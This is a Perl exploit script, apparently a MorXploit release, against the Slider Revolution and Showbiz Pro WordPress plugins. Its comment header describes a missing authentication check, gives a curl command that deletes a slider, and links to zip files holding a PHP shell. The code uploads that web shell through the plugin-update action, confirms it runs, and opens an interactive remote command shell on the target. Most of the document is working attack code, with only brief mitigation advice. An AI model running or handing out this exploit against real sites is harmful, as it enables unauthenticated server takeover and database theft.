#!/usr/bin/perl## Title: Slider Revolution/Showbiz Pro shell upload exploit# Author: Simo Ben youssef# Contact: Simo_at_Morxploit_com# Discovered: 15 October 2014# Coded: 15 October 2014# Updated: 25 November 2014# Published: 25 November 2014# MorXploit Research# http://www.MorXploit.com# Vendor: ThemePunch# Vendor url: http://themepunch.com# Software: Revslider/Showbiz Pro# Versions: <= 3.0.95 (Revslider) / Version: <= 1.7.1 (Showbiz Pro) # Products url: # http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380# http://codecanyon.net/item/showbiz-pro-responsive-teaser-wordpress-plugin/4720988# Vulnerable scripts:# revslider/revslider_admin.php# showbiz/showbiz_admin.php## About the plugins:# The #1 Slider plugin, used by millions, slider revolution is an all-purpose slide displaying solution that allows for showing almost any# kind of content whith highly customizable, transitions, effects and custom animations.# Showbiz Pro is a responsive teaser displaying solution that allows you to show WordPress Posts or any Custom Content with a set# amount of teaser items.## Description:# Slider Revolution and Showbiz Pro fail to check authentication in revslider_admin.php/showbiz_admin.php allowing an unauthenticated# attacker to abuse administrative features.# Some of the features include:# Creating/Deleting/Updating sliders# Importing/exporting sliders# Updading plugin# For a full list of functions please see revslider_admin.php/showbiz_admin.php## PoC on revslider:# 1- Deleting a slider:# root@host:/home/rootuser# curl -v --data "action=revslider_ajax_action&client_action=delete_slider&data[sliderid]=1" # http://****.com/wp-admin/admin-ajax.php# * Connected to ****.com (**.**.**.**) port 80 (#0)# > POST /wp-admin/admin-ajax.php HTTP/1.1# > User-Agent: curl/7.35.0# > Host: ****.com# > Accept: */*# > Content-Length: 73# > Content-Type: application/x-www-form-urlencoded# > # * upload completely sent off: 73 out of 73 bytes# < HTTP/1.1 200 OK# < Date: Fri, 24 Oct 2014 23:25:07 GMT# * Server Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 is not blacklisted# < Server: Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635# < X-Powered-By: PHP/5.4.18# < X-Robots-Tag: noindex# < X-Content-Type-Options: nosniff# < Expires: Wed, 11 Jan 1984 05:00:00 GMT# < Cache-Control: no-cache, must-revalidate, max-age=0# < Pragma: no-cache# < X-Frame-Options: SAMEORIGIN# < Set-Cookie: PHPSESSID=a23ex1c8a573f1d1xd28c301793ba022c; path=/# < Transfer-Encoding: chunked# < Content-Type: text/html; charset=UTF-8# < # * Connection #0 to host http://****.com left intact## {"success":true,"message":"The slider deleted","is_redirect":true,"redirect_url":"http:\/\/****.com\/wp-admin\/admin.php?page=revslider&view=sliders"}## 2- Uploading an web shell:# The following perl exploit will try to upload an HTTP php shell through the the update_plugin function# To use the exploit make sure you download first the revslider.zip and showbiz.zip files which contain cmd.php# http://www.morxploit.com/morxploits/revslider.zip# http://www.morxploit.com/morxploits/showbiz.zip# and save them it in the same directory where you have the exploit.# # Demo:# perl morxrev.pl http://localhost revslider# ===================================================# --- Revslider/Showbiz shell upload exploit# --- By: Simo Ben youssef <simo_at_morxploit_com># --- MorXploit Research www.MorXploit.com# ===================================================# [*] Target set to revslider# [*] MorXploiting http://localhost# [*] Sent payload# [+] Payload successfully executed# [*] Checking if shell was uploaded# [+] Shell successfully uploaded## Linux MorXploit 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux# uid=33(www-data) gid=33(www-data) groups=33(www-data)## www-data@MorXploit:~$ ## Download:# Exploit:# http://www.morxploit.com/morxploits/morxrevbiz.pl# Exploit update zip files:# http://www.morxploit.com/morxploits/revslider.zip# http://www.morxploit.com/morxploits/showbiz.zip## Requires LWP::UserAgent# apt-get install libwww-perl# yum install libwww-perl# perl -MCPAN -e 'install Bundle::LWP'# For SSL support:# apt-get install liblwp-protocol-https-perl# yum install perl-Crypt-SSLeay## Mitigation:# Besides the recently LFI vulnerability that was published couple months ago, this is another vulnerability that revslider developers have # decided to patch without releasing a full security advisory, leaving thousands of revslider users who didn't update their plugin to the# latest version (=> 3.0.96) vulnerable to this nasty flaw, revsliders developers will argue the fact that their slider comes with an# auto-update feature, but the problem is that this plugin is bundled with a lot of themes, which means that those themes users may not get# plugin updates or will have to pay to get the update. In other words revslider developers believe that every user should have the# auto-update feature on, otherwise ... you are screwed.# Obviously this is way more critical than the LFI vulnerability because it allows shell access giving attackers access to the target system# as well as the ability to dump the entire wordpress database locally.# That being said, upgrade immediately to the latest version or disable/switch to another plugin.# As for Showbiz Pro, sadly the vulnerability has never been patched as we successfully exploited it in the latest version (1.7.1).## Author disclaimer:# The information contained in this entire document is for educational, demonstration and testing purposes only.# Author cannot be held responsible for any malicious use or damage. Use at your own risk.## Got comments or questions?# Simo_at_MorXploit_dot_com## Did you like this exploit?# Feel free to buy me a beer =)# My btc address: 1Ko12CUAFoWn8syrvg4aQokFedNiwD6d7u# Cheers!
use LWP::UserAgent;
use MIME::Base64;
use strict;
sub banner {
system(($^O eq 'MSWin32') ? 'cls':'clear');print"===================================================\n";print"--- Revslider/Showbiz shell upload exploit\n";print"--- By: Simo Ben youssef <simo_at_morxploit_com>\n";print"--- MorXploit Research www.MorXploit.com\n";print"===================================================\n";}if(!defined ($ARGV[0]&& $ARGV[1])){
banner();print"perl $0 <target> <plugin>\n";print"perl $0 http://localhost revslider\n";print"perl $0 http://localhost showbiz\n";
exit;}
my $zip1 ="revslider.zip";
my $zip2 ="showbiz.zip";
unless (-e ($zip1 && $zip2)){
banner();print"[-] $zip1 or $zip2 not found! RTFM\n";
exit;}
my $host = $ARGV[0];
my $plugin = $ARGV[1];
my $action;
my $update_file;if($plugin eq "revslider"){
$action ="revslider_ajax_action";
$update_file ="$zip1";}
elsif ($plugin eq "showbiz"){
$action ="showbiz_ajax_action";
$update_file ="$zip2";}else{
banner();print"[-] Wrong plugin name\n";print"perl $0 <target> <plugin>\n";print"perl $0 http://localhost revslider\n";print"perl $0 http://localhost showbiz\n";
exit;}
my $target ="wp-admin/admin-ajax.php";
my $shell ="wp-content/plugins/$plugin/temp/update_extract/$plugin/cmd.php";
sub randomagent {
my @array =('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31');
my $random = $array[rand @array];return($random);}
my $useragent = randomagent();
my $ua = LWP::UserAgent->new(ssl_opts =>{ verify_hostname =>0});
$ua->timeout(10);
$ua->agent($useragent);
my $status = $ua->get("$host/$target");
unless ($status->is_success){
banner();print"[-] Xploit failed: ". $status->status_line ."\n";
exit;}
banner();print"[*] Target set to $plugin\n";print"[*] MorXploiting $host\n";
my $exploit = $ua->post("$host/$target", Cookie =>"", Content_Type =>"form-data", Content =>[action =>"$action", client_action =>"update_plugin", update_file =>["$update_file"]]);print"[*] Sent payload\n";if($exploit->decoded_content =~/Wrong update extracted folder/){print"[+] Payload successfully executed\n";}
elsif ($exploit->decoded_content =~/Wrong request/){print"[-] Payload failed: Not vulnerable\n";
exit;}
elsif ($exploit->decoded_content =~ m/0$/){print"[-] Payload failed: Plugin unavailable\n";
exit;}else{
$exploit->decoded_content =~/<\/b>(.*?)<br>/;print"[-] Payload failed:$1\n";print"[-] ". $exploit->decoded_content unless (defined $1);print"\n";
exit;}print"[*] Checking if shell was uploaded\n";
sub rndstr{ join'', @_[map{ rand @_ }1.. shift ]}
my $rndstr = rndstr(8,1..9,'a'..'z');
my $cmd1 = encode_base64("echo $rndstr");
my $status = $ua->get("$host/$shell?cmd=$cmd1");if($status->decoded_content =~/system\(\) has been disabled/){print"[-] Xploit failed: system() has been disabled\n";
exit;}
elsif ($status->decoded_content !~/$rndstr/){print"[-] Xploit failed: ". $status->status_line ."\n";
exit;}
elsif ($status->decoded_content =~/$rndstr/){print"[+] Shell successfully uploaded\n";}
my $cmd2 = encode_base64("whoami");
my $whoami = $ua->get("$host/$shell?cmd=$cmd2");
my $cmd3 = encode_base64("uname -n");
my $uname = $ua->get("$host/$shell?cmd=$cmd3");
my $cmd4 = encode_base64("id");
my $id= $ua->get("$host/$shell?cmd=$cmd4");
my $cmd5 = encode_base64("uname -a");
my $unamea = $ua->get("$host/$shell?cmd=$cmd5");print $unamea->decoded_content;print $id->decoded_content;
my $wa = $whoami->decoded_content;
my $un = $uname->decoded_content;
chomp($wa);
chomp($un);while(){print"\n$wa\@$un:~\$ ";
chomp(my $cmd=<STDIN>);if($cmd eq "exit"){print"Aurevoir!\n";
exit;}
my $ucmd = encode_base64("$cmd");
my $output = $ua->get("$host/$shell?cmd=$ucmd");print $output->decoded_content;}
